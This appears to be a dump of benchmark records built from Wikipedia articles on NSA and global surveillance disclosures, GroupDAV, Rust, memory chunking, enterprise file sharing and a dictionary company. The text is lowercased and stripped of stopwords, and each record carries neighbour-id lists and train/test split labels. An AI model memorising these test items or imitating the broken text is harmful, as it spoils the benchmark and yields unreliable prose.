massive metadata collection preventing terrorist attacks disputed many studies reveal dragnet like system ineffective one report released new america foundation concluded analysis 225 terrorism cases nsa discernible impact preventing acts terrorism defenders program said metadata alone ca n't provide information necessary prevent attack assures ability connect dots suspect foreign numbers domestic numbers speed nsa software capable one benefit quickly able determine difference suspicious activity real threats example nsa director general keith b. alexander mentioned annual cybersecurity summit 2013 metadata analysis domestic phone call records boston marathon bombing helped determine rumors follow-up attack new york baseless addition doubts effectiveness many people argue collection metadata unconstitutional invasion privacy collection process remains legal grounded ruling smith v. maryland 1979 prominent opponent data collection legality u.s. district judge richard j. leon issued report 2013 stated imagine 'indiscriminate 'arbitrary invasion systematic high tech collection retention personal data virtually every single citizen purposes querying analyzing without prior judicial approval ... surely program infringes 'that degree privacy founders enshrined fourth amendment may 7 2015 u.s. court appeals second circuit ruled interpretation section 215 patriot act wrong nsa program collecting americans phone records bulk illegal stated section 215 clearly interpreted allow government collect national phone data result expired june 1 2015 ruling first time higher-level court regular judicial system reviewed n.s.a phone records program replacement law known usa freedom act enable nsa continue bulk access citizens metadata stipulation data stored companies change effect agency procedures outside metadata collection purportedly challenged americans fourth amendment rights including upstream collection mass techniques used agency collect store american data/communications directly internet backbone upstream program nsa paid telecommunications companies 9 95 million dollars order collect data companies google yahoo claim provide direct access servers nsa unless court order nsa access emails phone calls cellular data users new ruling telecommunications companies maintain bulk user metadata servers least 18 months provided upon request nsa ruling made mass storage specific phone records nsa datacenters illegal rule section 215 constitutionality declassified document revealed 17,835 phone lines improperly permitted alert list 2006 2009 breach compliance tagged phone lines daily monitoring eleven percent monitored phone lines met agency legal standard reasonably articulable suspicion ras nsa tracks locations hundreds millions cellphones per day allowing map people movements relationships detail nsa reported access communications made via google microsoft facebook yahoo youtube aol skype apple paltalk collects hundreds millions contact lists personal email instant messaging accounts year also managed weaken much encryption used internet collaborating coercing otherwise infiltrating numerous technology companies leave backdoors systems majority encryption inadvertently vulnerable different forms attack domestically nsa proven collect store metadata records phone calls including 120 million us verizon subscribers well intercept vast amounts communications via internet upstream government legal standing rely secret interpretation patriot act whereby entirety us communications may considered relevant terrorism investigation expected even tiny minority may relate terrorism nsa also supplies foreign intercepts dea irs law enforcement agencies use initiate criminal investigations federal agents instructed recreate investigative trail via parallel construction nsa also spies influential muslims obtain information could used discredit use pornography targets domestic abroad suspected crime hold religious political views deemed radical nsa according report washington post july 2014 relying information provided snowden 90 placed surveillance u.s. ordinary americans intended targets newspaper said examined documents including emails text messages online accounts support claim despite white house claims programs congressional oversight many members congress unaware existence nsa programs secret interpretation patriot act consistently denied access basic information united states foreign intelligence surveillance court secret court charged regulating nsa activities according chief judge incapable investigating verifying often nsa breaks even secret rules since reported nsa violated rules data access thousands times year many violations involving large-scale data interceptions nsa officers even used data intercepts spy love interests nsa violations self-reported instance resulted administrative action termination nsa generally disregarded special rules disseminating united states person information illegally sharing intercepts law enforcement agencies march 2009 fisa court opinion court released states protocols restricting data queries frequently systemically violated fairly said critical element overall ... regime never functioned effectively 2011 court noted volume nature nsa bulk foreign internet intercepts fundamentally different court led believe email contact lists including us citizens collected numerous foreign locations work around illegality us soil legal opinions nsa bulk collection program differed mid-december 2013 u.s. district judge richard leon ruled almost-orwellian program likely violates constitution wrote imagine 'indiscriminate 'arbitrary invasion systematic high-tech collection retention personal data virtually every single citizen purposes querying analyzing without prior judicial approval surely program infringes 'that degree privacy founders enshrined fourth amendment indeed little doubt author constitution james madison cautioned us beware 'the abridgement freedom people gradual silent encroachments power would aghast later month u.s. district judge william pauley ruled nsa collection telephone records legal valuable fight terrorism opinion wrote bulk telephony metadata collection program wide net could find isolate gossamer contacts among suspected terrorists ocean seemingly disconnected data noted similar collection data prior 9/11 might prevented attack march 2013 senate intelligence committee hearing senator ron wyden asked director national intelligence james clapper nsa collect type data millions hundreds millions americans clapper replied sir ... wittingly cases could inadvertently perhaps collect wittingly statement came scrutiny months later june 2013 details prism surveillance program published showing nsa apparently gain access servers nine internet companies wide range digital data wyden said clapper failed give straight answer testimony clapper response criticism said responded thought truthful least untruthful manner clapper added honest differences semantics -- someone says ‘ collection ’ specific meaning may different meaning nsa whistler-blower edward snowden additionally revealed existence xkeyscore top secret nsa program allows agency search vast databases metadata well content emails internet activity browser history capability search name telephone number ip address keywords language internet activity conducted type browser used xkeyscore provides technological capability legal authority target even us persons extensive electronic surveillance without warrant provided identifying information email ip address known analyst regarding necessity nsa programs alexander stated june 27 nsa bulk phone internet intercepts instrumental preventing 54 terrorist events including 13 us one cases provided initial tip unravel threat stream july 31 nsa deputy director john inglis conceded senate intercepts vital stopping terrorist attacks close vital identifying convicting four san diego men sending us 8,930 al-shabaab militia conducts terrorism somalia u.s. government aggressively sought dismiss challenge fourth amendment cases raised granted retroactive immunity isps telecoms participating domestic surveillance u.s. military acknowledged blocking access parts guardian website thousands defense personnel across country blocking entire guardian website personnel stationed throughout afghanistan middle east south asia october 2014 united nations report condemned mass surveillance united states countries violating multiple international treaties conventions guarantee core privacy rights exploit eternalblue believed created nsa used unprecedented worldwide wannacry ransomware attack may 2017 exploit leaked online hacking group shadow brokers nearly month prior attack number experts pointed finger nsa non-disclosure underlying vulnerability loss control eternalblue attack tool exploited edward snowden said nsa privately disclosed flaw used attack hospitals found lost attack might happened wikipedia co-founder jimmy wales stated joined microsoft leaders industry saying huge screw-up government ... moment nsa found notified microsoft could quietly issue patch really chivvy people along long became huge problem
[ 2050, 4611, 9732, 3590, 6668, 4623, 3088, 9233, 2580, 6164, 4118, 7703, 8726, 9240, 6170, 9750, 8735, 3619, 11302, 8750, 10801, 7731, 1589, 7735, 7736, 7228, 5183, 9279, 10305, 10307, 11335, 4168, 2636, 7759, 6224, 10832, 3154, 3155, 8276, ...
None
7,888
5
GroupDAV:groupdav groupdav computer protocol used connect open source groupware clients open source groupware servers primary design goal simple possible implement focusing end-user issues open source applications extremely extensive command set based subset webdav client side groupdav implementations exist kde kontact evolution thunderbird outlook work mozilla calendar project progress servers include opengroupware.org sogo citadel system egroupware addition webdav caldav carddav server implicitly groupdav v2 server groupdav relationship caldav viewed differently different developers earliest implementors intended protocol complementary caldav effort caldav provides extensive operations calendar folders others positioned groupdav leading protocol citing caldav excessive complexity source interoperability bugs dichotomy likely become irrelevant future however straightforward server simultaneously support variants groupdav considered subset caldav rfc 4791 carddav rfc 6352 intended less complex applications
[ 11418, 2695 ]
Test
7,889
9
Rust_(programming_language):rust programming language rust multi-paradigm system programming language focused safety especially safe concurrency rust syntactically similar c++ designed provide better memory safety maintaining high performance rust originally designed graydon hoare mozilla research contributions dave herman brendan eich others designers refined language writing servo layout browser engine rust compiler compiler free open-source software dual-licensed mit license apache license 2.0 rust loved programming language stack overflow developer survey 2016 2017 2018 2019 rust intended language highly concurrent highly safe systems programming large creating maintaining boundaries preserve large-system integrity led feature set emphasis safety control memory layout concurrency performance idiomatic rust comparable performance idiomatic c++ concrete syntax rust similar c c++ blocks code delimited curly brackets control flow keywords codice_1 codice_2 codice_3 codice_4 c c++ keywords implemented however rust functions use keyword codice_5 pattern matching less familiar versed languages despite superficial resemblance c c++ syntax rust deeper sense closer ml family languages haskell language nearly every part function body expression even control flow operators example ordinary codice_1 expression also takes place function need end codice_7 expression case last expression function creates return value system designed memory safe permit null pointers dangling pointers data races safe code data values initialized fixed set forms require inputs already initialized replicate function languages pointers either valid codice_8 linked list binary tree data structures rust core library provides option type used test pointer codice_9 value codice_10 rust also introduces added syntax manage lifetimes compiler reasons borrow checker rust use automated garbage collection system like used go java .net framework instead memory resources managed resource acquisition initialization raii convention optional reference counting rust provides deterministic management resources low overhead rust also favors stack allocation values perform implicit boxing also concept references using codice_11 symbol involve run-time reference counting safety using pointers verified compile time borrow checker preventing dangling pointers forms undefined behavior rust ownership system values unique owner scope value scope owner values passed immutable reference using codice_12 mutable reference using codice_13 value using codice_14 times either multiple immutable references one mutable reference rust compiler enforces rules compile time also checks references valid type system supports mechanism similar type classes called traits inspired directly haskell language facility ad hoc polymorphism achieved adding constraints type variable declarations features haskell higher-kinded polymorphism yet supported rust features type inference variables declared keyword codice_15 variables require value initially assigned determine type compile-time error results branch code fails assign value variable variables assigned multiple times must marked keyword codice_16 functions given generic parameters usually require generic type implement certain trait traits within function generic value used traits means generic function type-checked soon defined contrast c++ templates fundamentally duck typed checked instantiated concrete types c++ concepts address issue expected part c++20 2020 however implementation rust generics similar typical implementation c++ templates separate copy code generated instantiation called monomorphization contrasts type erasure scheme typically used java haskell benefit monomorphization optimized code specific use case drawback increased compile time size resulting binaries object system within rust based around implementations traits structured types implementations fulfill role similar classes within languages defined keyword codice_17 inheritance polymorphism provided traits allow methods defined mixed implementations structured types used define fields implementations traits define fields traits provide inheritance among benefits prevents diamond problem multiple inheritance c++ words rust supports interface inheritance replaces implementation inheritance composition see composition inheritance language grew personal project begun 2006 mozilla employee graydon hoare stated project possibly named rust family fungi mozilla began sponsoring project 2009 announced 2010 year work shifted initial compiler written ocaml self-hosting compiler written rust named successfully compiled 2011. uses llvm back end first numbered pre-alpha release rust compiler occurred january 2012 rust 1.0 first stable release released may 15 2015 following 1.0 stable point releases delivered every six weeks features developed nightly rust tested alpha beta releases last six weeks along conventional static typing version 0.4 rust also supported typestates typestate system modeled assertions program statements use special codice_18 statement discrepancies could discovered compile time rather program running might case assertions c c++ code typestate concept unique rust first introduced language nil typestates removed practice little used though function still achieved branding pattern style object system changed considerably within versions 0.2 0.3 0.4 rust version 0.2 introduced classes first time version 0.3 adding several features including destructors polymorphism use interfaces rust 0.4 traits added means provide inheritance interfaces unified traits removed separate feature classes also removed replaced combination implementations structured types starting rust 0.9 ending rust 0.11 rust two built-in pointer types codice_19 codice_20 simplifying core memory model reimplemented pointer types standard library codice_21 removed codice_22 january 2014 editor-in-chief dr dobb andrew binstock commented rust chances become competitor c++ upcoming languages go nim nimrod according binstock rust widely viewed remarkably elegant language adoption slowed changed repeatedly versions rust third-most-loved programming language 2015 stack overflow annual survey took first place 2016 2017 2018 2019 language referenced oxidised metal simple hello world program written rust codice_23 macro prints message standard output fn main fn factorial u64 u64 fn factorial u64 u64 fn factorial u64 u64 web browser several related components written rust including many operating systems os related components written rust january 2019 oses included blogos intermezzos quiltos redox rustos rux tefflin tock wikipedia articles exist
[ 9224, 9736, 4623, 7187, 1556, 3613, 9245, 9757, 9762, 5165, 5677, 5684, 574, 6718, 2557, 7234, 9281, 10819, 8773, 8262, 6228, 6231, 10333, 9828, 10340, 1130, 2666, 10860, 4728, 3705, 7292, 637, 1664, 9345, 7813, 5255, 6791, 1673, 2186, 67...
Validation
7,890
2
Chunking_(computing):chunking computing computer programming chunking multiple meanings typical modern software systems allocate memory dynamically structures known heaps calls made heap-management routines allocate free memory heap management involves computation time performance issue chunking refers strategies improving performance using special knowledge situation aggregate related memory-allocation requests example known certain kind object typically required groups eight instead allocating freeing object individually making sixteen calls heap manager one could allocate free array eight objects reducing number calls two chunking specific feature http 1.1 protocol meaning opposite used memory management refers facility allows inconveniently large messages broken conveniently-sized smaller chunks
[ 178 ]
Validation
7,891
7
Enterprise_file_synchronization_and_sharing:enterprise file synchronization sharing enterprise file synchronization sharing also known efss enterprise file sync share refers software services enable organizations securely synchronize share documents photos videos files multiple devices employees external customers partners organizations often adopt technologies prevent employees using consumer-based file sharing apps store access manage corporate data outside department ’ control visibility efss applications often characterized following features capabilities depending efss provider offers services deployed using cloud computing on-premises hybrid according forrester research efss providers provide ability lockdown data certain geographies companies requirements store content/metadata specific jurisdictions box one first efss products originally developed college project aaron levie student university southern california 2004 levie left school run company full-time 2005 2007 dropbox founded officially launched 2008 techcrunch disrupt conference year microsoft began beta testing windows live folders predecessor onedrive around 2010 efss market emerged 100 vendors variety technology backgrounds including backup cloud storage citrix sharefile syncplicity managed file transfer accellion biscom box hightail thru enterprise content management many developed alternatives consumer file sync sharing services security features place protect company information flexibility integrate existing content repositories business applications october 2011 software company citrix systems announced acquired private enterprise file sync share service sharefile add citrix product line sharefile competitor box dropbox focused selling product departments large organizations 2012 ctera networks entered efss market july 2013 forrester research released first “ forrester wave ” report efss market identified scored products significant providers june 25 2014 google announced i/o conference entering enterprise file sharing market release “ google drive work. ” july 2014 gartner research released first “ magic quadrant ” report efss market study evaluates strengths cautions notable vendors industry october 2014 encrypted vendor tresorit entered efss market tresorit business tresorit competitor dropbox box promising businesses security privacy compliance end-to-end encryption april 2015 blackberry limited paid 100 million 150 million buy watchdox ltd. enterprise file sync sharing capabilities july 2015 one efss vendor syncplicity sold private equity firm skyview capital previous owner emc corporation
[ 929, 4194, 2213, 4869, 10245, 3629, 1935, 4623, 6897, 10161, 1239, 10265, 5371 ]
None
7,892
1
CJK_Dictionary_Institute:cjk dictionary institute cjk dictionary institute inc. cjki japan-based dictionary compilation company headed jack halpern specializes chinese japanese korean arabic lexicography well compilation maintenance large-scale lexical databases notable works include forthcoming cjki arabic learner dictionary kodansha kanji learner dictionary known introducing skip system kanji indexing patterns popular method kanji indexing addition printed works cjki produces language-oriented mobile applications ios android various electronic dictionaries include large number technical dictionaries covering subjects mechanical engineering economics medicine cjki maintains licenses large-scale lexical databases covering total approximately 24 million entries japanese chinese korean arabic notably database arabic names dan contains 6.5 million entries designed security applications e.g terrorist watchlists anti-money laundering systems customer identity management systems general natural language processing cjki ’ databases currently licensed number software development companies including fujitsu sony ibm google microsoft yahoo amazon cjki also responsible producing academic papers regarding technological linguistic issues pertaining chinese japanese korean arabic include papers discussing natural language processing use dictionaries language education 2009 paper introduces cjki arabic romanization system cars new arabic romanization including indications word stress vowel neutralization jack halpern founder ceo cjk dictionary institute linguist entrepreneur halpern speaker 10 languages editor chief kodansha kanji learner ’ dictionary addition work cjki halpern avid unicyclist founding serving executive director international development international unicycling federation lived japan 30 years
[ 7780, 2414 ]
Validation
7,893
4
Global_surveillance_disclosures_(2013–present):global surveillance disclosures 2013–present ongoing news reports international media revealed operational details united states national security agency nsa international partners global surveillance foreign nationals u.s. citizens reports mostly emanate cache top secret documents leaked ex-nsa contractor edward snowden obtained whilst working booz allen hamilton one largest contractors defense intelligence united states addition trove u.s. federal documents snowden cache reportedly contains thousands australian british canadian intelligence files accessed via exclusive five eyes network june 2013 first snowden documents published simultaneously washington post guardian attracting considerable public attention disclosure continued throughout 2013 small portion estimated full cache documents later published media outlets worldwide notably new york times united states canadian broadcasting corporation australian broadcasting corporation der spiegel germany globo brazil le monde france l'espresso italy nrc handelsblad netherlands dagbladet norway el país spain sveriges television sweden media reports shed light implications several secret treaties signed members ukusa community efforts implement global surveillance example der spiegel revealed german foreign intelligence service bnd transfers massive amounts intercepted data nsa swedish television revealed national defence radio establishment fra provided nsa data cable collection secret treaty signed 1954 bilateral cooperation surveillance security intelligence agencies involved practice global surveillance include australia asd britain gchq canada csec denmark pet france dgse germany bnd italy aise netherlands aivd norway nis spain cni switzerland ndb singapore sid well israel isnu receives raw unfiltered data u.s. citizens shared nsa june 14 2013 united states prosecutors charged edward snowden espionage theft government property late july 2013 granted one-year temporary asylum russian government contributing deterioration russia–united states relations august 6 2013 u.s. president barack obama made public appearance national television told americans n't domestic spying program spying americans towards end october 2013 british prime minister david cameron warned guardian publish leaks receive da-notice november 2013 criminal investigation disclosure undertaken britain metropolitan police service december 2013 guardian editor alan rusbridger said published think 26 documents far 58,000 've seen extent media reports responsibly informed public disputed january 2014 obama said sensational way disclosures come often shed heat light critics sean wilentz noted many snowden documents released concern domestic surveillance us uk defense establishment weigh strategic harm period following disclosures heavily civic public benefit first assessment disclosures pentagon concluded snowden committed biggest theft u.s. secrets history united states sir david omand former director gchq described snowden disclosure catastrophic loss british intelligence ever barton gellman pulitzer prize–winning journalist led washington post coverage snowden disclosures summarized leaks follows disclosure revealed specific details nsa close cooperation u.s. federal agencies federal bureau investigation fbi central intelligence agency cia addition agency previously undisclosed financial payments numerous commercial partners telecommunications companies well previously undisclosed relationships international partners britain france germany secret treaties foreign governments recently established sharing intercepted data citizens disclosures made public course several months since june 2013 press several nations trove leaked former nsa contractor edward j. snowden obtained trove working booz allen hamilton george brandis attorney-general australia asserted snowden disclosure serious setback western intelligence since second world war global surveillance programs include nsa also getting data directly telecommunications companies codenamed artifice lithium serenade steelknight x real identities companies behind codenames included snowden document dump protected exceptionally controlled information prevents wide circulation even like snowden otherwise necessary security clearance although exact size snowden disclosure remains unknown following estimates put various government officials contractor nsa snowden granted access u.s. government documents along top secret documents several allied governments via exclusive five eyes network snowden claims currently physical possession documents surrendered copies journalists met hong kong according lawyer snowden pledged release documents russia leaving responsibility disclosures solely journalists 2014 following news outlets accessed documents provided snowden australian broadcasting corporation canadian broadcasting corporation channel 4 der spiegel el pais el mundo l'espresso le monde nbc nrc handelsblad dagbladet globo south china morning post süddeutsche zeitung sveriges television guardian new york times washington post 1970s nsa analyst perry fellwock pseudonym winslow peck revealed existence ukusa agreement forms basis echelon network whose existence revealed 1988 lockheed employee margaret newsham months september 11 attacks aftermath details global surveillance apparatus provided various individuals former mi5 official david shayler journalist james bamford followed aftermath snowden revelations pentagon concluded snowden committed biggest theft u.s. secrets history united states australia coalition government described leaks damaging blow dealt australian intelligence history sir david omand former director gchq described snowden disclosure catastrophic loss british intelligence ever april 2012 nsa contractor edward snowden began downloading documents year snowden made first contact journalist glenn greenwald employed guardian contacted documentary filmmaker laura poitras january 2013 may 2013 snowden went temporary leave position nsa citing pretext receiving treatment epilepsy towards end may traveled hong kong greenwald poitras guardian defence intelligence correspondent ewen macaskill flew hong kong meet snowden u.s.-based editor guardian janine gibson held several meetings new york city decided greenwald poitras guardian defence intelligence correspondent ewen macaskill would fly hong kong meet snowden june 5 first media report based leaked material guardian exposed top secret court order showing nsa collected phone records 120 million verizon subscribers order numbers parties call well location data unique identifiers time call duration call handed fbi turned records nsa according wall street journal verizon order part controversial data program seeks stockpile records calls made u.s. collect information directly t-mobile us verizon wireless part foreign ownership ties june 6 2013 second media disclosure revelation prism surveillance program collects e-mail voice text video chats foreigners unknown number americans microsoft google facebook yahoo apple tech giants published simultaneously guardian washington post der spiegel revealed nsa spying multiple diplomatic missions european union eu united nations headquarters new york specific episodes within four-year period nsa hacked several chinese mobile-phone companies chinese university hong kong tsinghua university beijing asian fiber-optic network operator pacnet australia canada new zealand uk explicitly exempted nsa attacks whose main target eu germany method bugging encrypted fax machines used eu embassy codenamed dropmire 2009 g-20 london summit british intelligence agency government communications headquarters gchq intercepted communications foreign diplomats addition gchq intercepting storing mass quantities fiber-optic traffic via tempora two principal components tempora called mastering internet mti global telecoms exploitation data preserved three days metadata kept thirty days data collected gchq tempora shared national security agency nsa united states 2001 2011 nsa collected vast amounts metadata records detailing email internet usage americans via stellar wind later terminated due operational resource constraints subsequently replaced newer surveillance programs shelltrumpet processed one trillionth metadata record end december 2012 nsa follows specific procedures target non-u.s. persons minimize data collection u.s. persons court-approved policies allow nsa according boundless informant 97 billion pieces intelligence collected 30-day period ending march 2013 97 billion sets information 3 billion data sets originated u.s. computer networks around 500 million metadata records collected german networks august 2013 revealed bundesnachrichtendienst bnd germany transfers massive amounts metadata records nsa der spiegel disclosed germany targeted country 27 members european union due nsa systematic monitoring storage germany telephone internet connection data according magazine nsa stores data around half billion communications connections germany month data includes telephone calls emails mobile-phone text messages chat transcripts nsa gained massive amounts information captured monitored data traffic europe example december 2013 nsa gathered average day metadata 15 million telephone connections 10 million internet datasets nsa also monitored european commission brussels monitored eu diplomatic facilities washington united nations placing bugs offices well infiltrating computer networks u.s. government made part upstream data collection program deals companies ensure access hence capability surveil undersea fiber-optic cables deliver e-mails web pages electronic communications phone calls one continent another speed light according brazilian newspaper globo nsa spied millions emails calls brazilian citizens australia new zealand involved joint operation nsa global analytical system xkeyscore among numerous allied facilities contributing xkeyscore four installations australia one new zealand globo released nsa document titled revealed specific locations codenames fornsat intercept stations 2002 according edward snowden nsa established secret intelligence partnerships many western governments foreign affairs directorate fad nsa responsible partnerships according snowden organized foreign governments insulate political leaders public outrage event global surveillance partnerships leaked interview published der spiegel snowden accused nsa bed together germans nsa granted german intelligence agencies bnd foreign intelligence bfv domestic intelligence access controversial xkeyscore system return bnd turned copies two systems named mira4 veras reported exceed nsa sigint capabilities certain areas every day massive amounts metadata records collected bnd transferred nsa via bad aibling station near munich germany december 2012 alone bnd handed 500 million metadata records nsa document dated january 2013 nsa acknowledged efforts bnd undermine privacy laws according nsa document dated april 2013 germany become nsa prolific partner section separate document leaked snowden titled success stories nsa acknowledged efforts german government expand bnd international data sharing partners addition german government well aware prism surveillance program long edward snowden made details public according angela merkel spokesman steffen seibert two separate prism programs – one used nsa used nato forces afghanistan two programs identical guardian revealed details nsa xkeyscore tool allows government analysts search vast databases containing emails online chats browsing histories millions individuals without prior authorization microsoft developed surveillance capability deal interception encrypted chats outlook.com within five months service went testing nsa access outlook.com emails prism collects data prior encryption addition microsoft worked fbi enable nsa gain access cloud storage service skydrive internal nsa document dating august 3 2012 described prism surveillance program team sport even reason suspect u.s. citizens wrongdoing cia national counterterrorism center allowed examine federal government files possible criminal behavior previously ntc barred unless person terror suspect related investigation snowden also confirmed stuxnet cooperatively developed united states israel report unrelated edward snowden french newspaper le monde revealed france dgse also undertaking mass surveillance described illegal outside serious control documents leaked edward snowden seen süddeutsche zeitung sz norddeutscher rundfunk revealed several telecom operators played key role helping british intelligence agency government communications headquarters gchq tap worldwide fiber-optic communications telecom operators assigned particular area international fiber-optic network individually responsible following networks infiltrated gchq tat-14 europe-usa atlantic crossing 1 europe-usa circe south france-uk circe north netherlands-uk flag atlantic-1 flag europa-asia sea-me-we 3 southeast asia-middle east-western europe sea-me-we 4 southeast asia-middle east-western europe solas ireland-uk uk-france 3 uk-netherlands 14 ulysses europe-uk yellow uk-usa pan european crossing telecommunication companies participated forced choice matter companies subsequently paid gchq participation infiltration cables according sz gchq access majority internet telephone communications flowing throughout europe listen phone calls read emails text messages see websites internet users around world visiting also retain analyse nearly entire european internet traffic gchq collecting data transmitted united kingdom northern europe via undersea fibre optic telecommunications cable sea-me-we 3 security intelligence division sid singapore co-operates australia accessing sharing communications carried sea-me-we-3 cable australian signals directorate asd also partnership british american singaporean intelligence agencies tap undersea fibre optic telecommunications cables link asia middle east europe carry much australia international phone internet traffic u.s. runs top-secret surveillance program known special collection service scs based 80 u.s. consulates embassies worldwide nsa hacked united nations video conferencing system summer 2012 violation un agreement nsa intercepting communications americans direct contact foreigners targeted overseas also searching contents vast amounts e-mail text communications country americans mention information foreigners surveillance also spied al jazeera gained access internal communications systems nsa built surveillance network capacity reach roughly 75 u.s. internet traffic u.s. law-enforcement agencies use tools used computer hackers gather information suspects internal nsa audit may 2012 identified 2776 incidents i.e violations rules court orders surveillance americans foreign targets u.s. period april 2011 march 2012 u.s. officials stressed mistakes intentional fisa court supposed provide critical oversight u.s. government vast spying programs limited ability must trust government report improperly spies americans legal opinion declassified august 21 2013 revealed nsa intercepted three years many 56,000 electronic communications year americans suspected links terrorism fisa court oversees surveillance found operation unconstitutional 2011 corporate partner access project major u.s. telecommunications providers receive hundreds millions dollars year nsa voluntary cooperation nsa providers global communications took 1970s cover name blarney letter drafted obama administration specifically inform congress government mass collection americans telephone communications data withheld lawmakers leaders house intelligence committee months key vote affecting future program nsa paid gchq £100 million 2009 2012 exchange funds gchq must pull weight seen pull weight documents referenced article explain weaker british laws regarding spying selling point nsa gchq also developing technology exploit mobile phone time nsa legal authority secret backdoor databases gathered large internet companies enabling search u.s. citizens email phone calls without warrant privacy civil liberties oversight board urged u.s. intelligence chiefs draft stronger us surveillance guidelines domestic spying finding several guidelines updated 30 years u.s. intelligence analysts deliberately broken rules designed prevent spying americans choosing ignore so-called minimisation procedures aimed protecting privacy used nsa agency enormous eavesdropping power spy love interests u.s. foreign secret intelligence court ruled october 2011 nsa activities unconstitutional agency paid millions dollars major internet companies cover extra costs incurred involvement prism surveillance program mastering internet mti part interception modernisation programme imp british government involves insertion thousands dpi deep packet inspection black boxes various internet service providers revealed british media 2009 2013 revealed nsa made £17.2 million financial contribution project capable vacuuming signals 200 fibre-optic cables physical points entry great britain guardian new york times reported secret documents leaked snowden showing nsa collaboration technology companies part aggressive multipronged effort weaken encryption used commercial software gchq team dedicated cracking hotmail google yahoo facebook traffic germany domestic security agency bundesverfassungsschutz bfv systematically transfers personal data german residents nsa cia seven members united states intelligence community exchange information espionage software israel sweden italy also cooperating american british intelligence agencies secret treaty codenamed lustre french intelligence agencies transferred millions metadata records nsa obama administration secretly permission foreign intelligence surveillance court 2011 reverse restrictions national security agency use intercepted phone calls e-mails permitting agency search deliberately americans communications massive databases searches take place surveillance program congress authorized 2008 section 702 foreign intelligence surveillance act law target must foreigner reasonably believed outside united states court must approve targeting procedures order good one year warrant target would thus longer required means communications americans could picked without court first determining probable cause people talking terrorists spies foreign powers fisc extended length time nsa allowed retain intercepted u.s. communications five years six years extension possible foreign intelligence counterintelligence purposes measures done without public debate specific authority congress special branch nsa called follow money ftm monitors international payments banking credit card transactions later stores collected data nsa financial databank tracfin nsa monitored communications brazil president dilma rousseff top aides agency also spied brazil oil firm petrobras well french diplomats gained access private network ministry foreign affairs france swift network united states nsa uses analysis phone call e-mail logs american citizens create sophisticated graphs social connections identify associates locations certain times traveling companions personal information nsa routinely shares raw intelligence data israel without first sifting remove information u.s. citizens effort codenamed genie computer specialists control foreign computer networks using covert implants form remotely transmitted malware tens thousands devices annually worldwide sales smartphones began exceeding feature phones nsa decided take advantage smartphone boom particularly advantageous smartphone combines myriad data would interest intelligence agency social contacts user behavior interests location photos credit card numbers passwords internal nsa report 2010 stated spread smartphone occurring extremely rapidly —developments certainly complicate traditional target analysis according document nsa set task forces assigned several smartphone manufacturers operating systems including apple inc. iphone ios operating system well google android mobile operating system similarly britain gchq assigned team study crack blackberry heading iphone capability document notes smaller nsa programs known scripts perform surveillance 38 different features ios 3 ios 4 operating systems include mapping feature voicemail photos well google earth facebook yahoo messenger september 9 2013 internal nsa presentation iphone location services published der spiegel one slide shows scenes apple 1984 -themed television commercial alongside words knew 1984 ... another shows steve jobs holding iphone text ... would big brother ... third shows happy consumers iphones completing question ... zombies would paying customers october 4 2013 washington post guardian jointly reported nsa gchq made repeated attempts spy anonymous internet users communicating secret via anonymity network tor several surveillance operations involved implantation malicious code computers tor users visit particular websites nsa gchq partly succeeded blocking access anonymous network diverting tor users insecure channels government agencies also able uncover identity anonymous internet users communications security establishment cse using program called olympia map communications brazil mines energy ministry targeting metadata phone calls emails ministry australian federal government knew prism surveillance program months edward snowden made details public nsa gathered hundreds millions contact lists personal e-mail instant messaging accounts around world agency target individuals instead collected contact lists large numbers amount sizable fraction world e-mail instant messaging accounts analysis data enables agency search hidden connections map relationships within much smaller universe foreign intelligence targets nsa monitored public email account former mexican president felipe calderón thus gaining access communications high-ranking cabinet members emails several high-ranking members mexico security forces text mobile phone communication current mexican president enrique peña nieto nsa tries gather cellular landline phone numbers—often obtained american diplomats—for many foreign officials possible contents phone calls stored computer databases regularly searched using keywords nsa monitoring telephone conversations 35 world leaders u.s. government first public acknowledgment tapped phones world leaders reported october 28 2013 wall street journal internal u.s. government review turned nsa monitoring 35 world leaders gchq tried keep mass surveillance program secret feared damaging public debate scale activities could lead legal challenges guardian revealed nsa monitoring telephone conversations 35 world leaders given numbers official another u.s. government department confidential memo revealed nsa encouraged senior officials departments white house state pentagon share rolodexes agency could add telephone numbers leading foreign politicians surveillance systems reacting news german leader angela merkel arriving brussels eu summit accused u.s. breach trust saying need trust allies partners must established repeat spying among friends acceptable anyone goes every citizen germany nsa collected 2010 data ordinary americans cellphone locations later discontinued operational value britain muscular programme nsa gchq secretly broken main communications links connect yahoo google data centers around world thereby gained ability collect metadata content hundreds millions user accounts mobile phone german chancellor angela merkel might tapped u.s. intelligence according spiegel monitoring goes back 2002 ended summer 2013 new york times reported germany evidence nsa surveillance merkel began george w. bush tenure learning der spiegel magazine nsa listening personal mobile phone merkel compared snooping practices nsa stasi reported march 2014 der spiegel merkel also placed nsa surveillance list alongside 122 world leaders october 31 2013 hans-christian ströbele member german bundestag met snowden moscow revealed former intelligence contractor readiness brief german government nsa spying highly sensitive signals intelligence collection program known stateroom involves interception radio telecommunications internet traffic operated diplomatic missions five eyes australia britain canada new zealand united states numerous locations around world program conducted u.s. diplomatic missions run concert u.s. intelligence agencies nsa cia joint venture group called special collection service scs whose members work undercover shielded areas american embassies consulates officially accredited diplomats enjoy special privileges diplomatic protection able look listen unhindered scs example used american embassy near brandenburg gate berlin monitor communications germany government district parliament seat government stateroom surveillance programme australia operates clandestine surveillance facilities intercept phone calls data across much asia france nsa targeted people belonging worlds business politics french state administration nsa monitored recorded content telephone communications history connections target i.e metadata actual surveillance operation performed french intelligence agencies behalf nsa cooperation france nsa confirmed director nsa keith b. alexander asserted foreign intelligence services collected phone records war zones areas outside borders provided nsa french newspaper le monde also disclosed new prism upstream slides see page 4 7 8 coming prism/us-984xn overview presentation spain nsa intercepted telephone conversations text messages emails millions spaniards spied members spanish government december 10 2012 january 8 2013 nsa collected metadata 60 million telephone calls spain according documents leaked snowden surveillance spanish citizens jointly conducted nsa intelligence agencies spain new york times reported nsa carries eavesdropping effort dubbed operation dreadnought iranian leader ayatollah ali khamenei 2009 visit iranian kurdistan agency collaborated gchq u.s. national geospatial-intelligence agency collecting radio transmissions aircraft airports examining khamenei convoy satellite imagery enumerating military radar stations according story objective operation communications fingerprinting ability distinguish khamenei communications people iran story revealed operation code-named ironavenger nsa intercepted e-mails sent country allied united states government adversary ally conducting spear-phishing attack e-mails contained malware nsa gathered documents login credentials belonging enemy country along knowledge ally capabilities attacking computers according british newspaper independent british intelligence agency gchq maintains listening post roof british embassy berlin capable intercepting mobile phone calls wi-fi data long-distance communications german capital including adjacent government buildings reichstag seat german parliament chancellery seat germany head government clustered around brandenburg gate operating 